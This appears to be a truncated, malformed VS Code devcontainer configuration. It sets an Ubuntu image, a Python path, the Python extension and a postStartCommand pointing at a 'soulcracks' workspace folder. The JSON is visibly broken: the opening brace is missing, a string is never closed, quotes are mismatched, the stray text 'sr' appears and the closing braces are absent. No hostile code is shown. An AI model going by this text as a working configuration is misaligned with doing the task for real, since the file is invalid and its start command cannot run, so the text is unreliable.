"name": "My Codespace",

"image": "ubuntu:22.04",

"postStartCommand": "python3/workspaces/soulcracks/

"customizations": {

"vscode": {

"settings": {

"python.pythonPath": "/usr/local/bin/python"

},

'extensions": [

"ms-python.python"

sr
